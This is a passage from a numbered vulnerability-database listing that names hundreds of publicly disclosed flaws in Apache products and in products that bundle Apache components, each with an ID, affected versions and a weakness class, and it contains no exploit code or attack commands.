4939| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
4940| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
4941| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
4942| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
4943| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
4944| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
4945| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
4946| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
4947| [87765] Apache James Server 2.3.2 Command privilege escalation
4948| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
4949| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
4950| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
4951| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
4952| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
4953| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
4954| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
4955| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
4956| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
4957| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4958| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4959| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
4960| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
4961| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
4962| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4963| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4964| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
4965| [87172] Adobe ColdFusion up to 10 Update 18/11 Update 7/2016 Apache Commons Collections Library privilege escalation
4966| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
4967| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
4968| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
4969| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
4970| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
4971| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
4972| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
4973| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
4974| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
4975| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
4976| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
4977| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
4978| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
4979| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
4980| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
4981| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
4982| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
4983| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
4984| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
4985| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
4986| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
4987| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
4988| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
4989| [82076] Apache Ranger up to 0.5.1 privilege escalation
4990| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
4991| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
4992| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
4993| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
4994| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
4995| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
4996| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
4997| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
4998| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
4999| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
5000| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
5001| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
5002| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5003| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5004| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
5005| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
5006| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
5007| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
5008| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
5009| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
5010| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
5011| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
5012| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
5013| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
5014| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
5015| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
5016| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
5017| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
5018| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
5019| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
5020| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
5021| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
5022| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
5023| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
5024| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
5025| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
5026| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
5027| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
5028| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
5029| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
5030| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
5031| [79791] Cisco Products Apache Commons Collections Library privilege escalation
5032| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5033| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5034| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
5035| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
5036| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
5037| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
5038| [78989] Apache Ambari up to 2.1.1 Open Redirect
5039| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
5040| [78987] Apache Ambari up to 2.0.x cross site scripting
5041| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
5042| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5043| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5044| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5045| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5046| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5047| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5048| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5049| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
5050| [77406] Apache Flex BlazeDS AMF Message XML External Entity
5051| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
5052| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
5053| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
5054| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
5055| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
5056| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
5057| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
5058| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
5059| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
5060| [76567] Apache Struts 2.3.20 unknown vulnerability
5061| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
5062| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
5063| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
5064| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
5065| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
5066| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
5067| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
5068| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
5069| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
5070| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
5071| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
5072| [74793] Apache Tomcat File Upload denial of service
5073| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
5074| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
5075| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
5076| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
5077| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
5078| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
5079| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
5080| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
5081| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
5082| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
5083| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
5084| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
5085| [74468] Apache Batik up to 1.6 denial of service
5086| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
5087| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
5088| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
5089| [74174] Apache WSS4J up to 2.0.0 privilege escalation
5090| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
5091| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
5092| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
5093| [73731] Apache XML Security unknown vulnerability
5094| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
5095| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
5096| [73593] Apache Traffic Server up to 5.1.0 denial of service
5097| [73511] Apache POI up to 3.10 Deadlock denial of service
5098| [73510] Apache Solr up to 4.3.0 cross site scripting
5099| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
5100| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
5101| [73173] Apache CloudStack Stack-Based unknown vulnerability
5102| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
5103| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
5104| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
5105| [72890] Apache Qpid 0.30 unknown vulnerability
5106| [72887] Apache Hive 0.13.0 File Permission privilege escalation
5107| [72878] Apache Cordova 3.5.0 cross site request forgery
5108| [72877] Apache Cordova 3.5.0 cross site request forgery
5109| [72876] Apache Cordova 3.5.0 cross site request forgery
5110| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
5111| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
5112| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
5113| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
5114| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5115| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5116| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
5117| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
5118| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
5119| [71629] Apache Axis2/C spoofing
5120| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
5121| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
5122| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
5123| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
5124| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
5125| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
5126| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
5127| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
5128| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
5129| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
5130| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
5131| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
5132| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
5133| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
5134| [70809] Apache POI up to 3.11 Crash denial of service
5135| [70808] Apache POI up to 3.10 unknown vulnerability
5136| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
5137| [70749] Apache Axis up to 1.4 getCN spoofing
5138| [70701] Apache Traffic Server up to 3.3.5 denial of service
5139| [70700] Apache OFBiz up to 12.04.03 cross site scripting
5140| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
5141| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
5142| [70661] Apache Subversion up to 1.6.17 denial of service
5143| [70660] Apache Subversion up to 1.6.17 spoofing
5144| [70659] Apache Subversion up to 1.6.17 spoofing
5145| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
5146| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
5147| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
5148| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
5149| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
5150| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
5151| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
5152| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
5153| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
5154| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
5155| [69846] Apache HBase up to 0.94.8 information disclosure
5156| [69783] Apache CouchDB up to 1.2.0 memory corruption
5157| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
5158| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid() privilege escalation
5159| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
5160| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
5161| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
5162| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
5163| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
5164| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
5165| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
5166| [69431] Apache Archiva up to 1.3.6 cross site scripting
5167| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
5168| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
5169| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init() privilege escalation
5170| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
5171| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
5172| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
5173| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
5174| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
5175| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
5176| [66739] Apache Camel up to 2.12.2 unknown vulnerability
5177| [66738] Apache Camel up to 2.12.2 unknown vulnerability
5178| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
5179| [66695] Apache CouchDB up to 1.2.0 cross site scripting
5180| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
5181| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
5182| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
5183| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
5184| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
5185| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
5186| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
5187| [66356] Apache Wicket up to 6.8.0 information disclosure
5188| [12209] Apache Tomcat 8.0.0-RC1/8.0.1/7.0.0/7.0.50 Content-Type Header for Multi-Part Request Infinite Loop denial of service
5189| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
5190| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5191| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
5192| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
5193| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5194| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5195| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
5196| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
5197| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
5198| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
5199| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
5200| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
5201| [65668] Apache Solr 4.0.0 Updater denial of service
5202| [65665] Apache Solr up to 4.3.0 denial of service
5203| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
5204| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
5205| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
5206| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
5207| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
5208| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
5209| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
5210| [65410] Apache Struts 2.3.15.3 cross site scripting
5211| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
5212| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
5213| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
5214| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
5215| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
5216| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
5217| [65340] Apache Shindig 2.5.0 information disclosure
5218| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
5219| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
5220| [10826] Apache Struts 2 File privilege escalation
5221| [65204] Apache Camel up to 2.10.1 unknown vulnerability
5222| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
5223| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
5224| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
5225| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file() race condition
5226| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
5227| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
5228| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
5229| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
5230| [64722] Apache XML Security for C++ Heap-based memory corruption
5231| [64719] Apache XML Security for C++ Heap-based memory corruption
5232| [64718] Apache XML Security for C++ verify denial of service
5233| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
5234| [64716] Apache XML Security for C++ spoofing
5235| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
5236| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
5237| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
5238| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
5239| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
5240| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
5241| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
5242| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
5243| [64485] Apache Struts up to 2.2.3.0 privilege escalation
5244| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
5245| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
5246| [64467] Apache Geronimo 3.0 memory corruption
5247| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
5248| [64457] Apache Struts up to 2.2.3.0 cross site scripting
5249| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
5250| [9184] Apache Qpid up to 0.20 SSL misconfiguration
5251| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
5252| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
5253| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
5254| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
5255| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
5256| [8873] Apache Struts 2.3.14 privilege escalation
5257| [8872] Apache Struts 2.3.14 privilege escalation
5258| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
5259| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
5260| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
5261| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
5262| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
5263| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5264| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5265| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
5266| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
5267| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
5268| [64006] Apache ActiveMQ up to 5.7.0 denial of service
5269| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
5270| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
5271| [8427] Apache Tomcat Session Transaction weak authentication
5272| [63960] Apache Maven 3.0.4 Default Configuration spoofing
5273| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
5274| [63750] Apache qpid up to 0.20 checkAvailable denial of service
5275| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
5276| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
5277| [63747] Apache Rave up to 0.20 User Account information disclosure
5278| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
5279| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
5280| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
5281| [7687] Apache CXF up to 2.7.2 Token weak authentication
5282| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5283| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5284| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
5285| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
5286| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
5287| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
5288| [63090] Apache Tomcat up to 4.1.24 denial of service
5289| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
5290| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
5291| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
5292| [62833] Apache CXF -/2.6.0 spoofing
5293| [62832] Apache Axis2 up to 1.6.2 spoofing
5294| [62831] Apache Axis up to 1.4 Java Message Service spoofing
5295| [62830] Apache Commons-httpclient 3.0 Payments spoofing
5296| [62826] Apache Libcloud up to 0.11.0 spoofing
5297| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
5298| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
5299| [62661] Apache Axis2 unknown vulnerability
5300| [62658] Apache Axis2 unknown vulnerability
5301| [62467] Apache Qpid up to 0.17 denial of service
5302| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
5303| [6301] Apache HTTP Server mod_pagespeed cross site scripting
5304| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
5305| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
5306| [62035] Apache Struts up to 2.3.4 denial of service
5307| [61916] Apache QPID 0.14/0.16/0.5/0.6 unknown vulnerability
5308| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
5309| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
5310| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
